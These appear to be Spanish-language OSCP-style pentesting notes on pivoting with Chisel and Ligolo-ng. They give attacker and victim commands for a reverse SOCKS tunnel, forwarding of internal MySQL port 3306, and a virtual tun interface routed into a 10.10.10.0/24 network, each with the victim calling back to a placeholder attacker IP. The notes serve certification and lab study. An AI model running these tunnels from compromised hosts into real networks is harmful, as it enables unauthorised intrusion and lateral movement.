Chisel & Ligolo (Tools)
Chisel (El estándar OSCP)
Funciona por HTTP, atraviesa firewalls.
Escenario: Reverse SOCKS Proxy (La víctima se conecta a ti y te da un túnel SOCKS).
- Atacante (Server):
./chisel server -p 8000 --reverse - Víctima (Client):
./chisel client <IP_ATACANTE>:8000 R:socks - Config: Proxychains puerto 1080.
Escenario: Port Forward (Traer puerto 3306 interno a tu puerto 3306).
- Client:
./chisel client <IP_ATACANTE>:8000 R:3306:127.0.0.1:3306
Ligolo-ng (Avanzado)
Crea una interfaz de red virtual (tun) en lugar de un proxy SOCKS. Es más rápido y permite ping y nmap -sS.
- Atacante:
sudo ip tuntap add user kali mode tun ligolo sudo ip link set ligolo up ./proxy -selfcert - Víctima:
./agent -connect <IP_ATACANTE>:11601 -ignore-cert - Atacante (En la consola de ligolo):
session 1 startLuego añadir ruta en Kali:
sudo ip route add 10.10.10.0/24 dev ligolo